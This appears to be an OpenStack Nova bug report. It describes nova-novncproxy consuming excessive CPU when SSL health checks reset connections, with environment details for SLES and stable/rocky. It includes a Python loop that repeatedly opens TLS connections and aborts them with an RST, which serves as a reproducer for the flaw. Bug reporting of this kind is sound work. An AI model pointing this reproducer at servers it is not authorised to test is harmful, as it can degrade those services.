1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging.

2. You can simulate the haproxy SSL health check with this Python script:

    import socket, ssl, struct, time

    host = '192.168.237.81'
    port = 5554

    while True:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ssl_sock = ssl.wrap_socket(sock)
        ssl_sock.connect((host, port))
        ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
        sock.close()
        time.sleep(2)

Expected result
===============

nova-novncproxy should gracefully handle the RST and not start over-utilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received.

Actual result
=============

The nova-novncproxy process quickly jumps to the top of the CPU% metrics in process monitors such as top and htop, and if left unattended on a server with few cores it will degrade the server's overall performance.

Environment
===========

We found this on the latest stable/rocky branch on SLES:

# cat /etc/os-release
NAME="SLES"
VERSION="12-SP4"
VERSION_ID="12.4"
PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4"

# uname -a
Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux

# zypper info openstack-nova
Information for package openstack-nova:
---------------------------------------
Repository     : Cloud
Name           : openstack-nova
Version        : 18.1.1~dev47-749.1
Arch           : noarch
Vendor         : obs://build.suse.de/Devel:Cloud
Support Level  : Level 3
Installed Size : 444.7 KiB
Installed      : Yes
Status         : up-to-date
Source package : openstack-nova-18.1.1~dev47-749.1.src
Summary        : OpenStack Compute (Nova)

# zypper info haproxy
Information for package haproxy:
--------------------------------
Repository     : Cloud
Name           : haproxy
Version        : 1.6.11-10.2
Arch           : x86_64
Vendor         : SUSE LLC
Support Level  : Level 3
Installed Size : 3.1 MiB
Installed      : Yes
Status         : up-to-date
Source package : haproxy-1.6.11-10.2.src

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions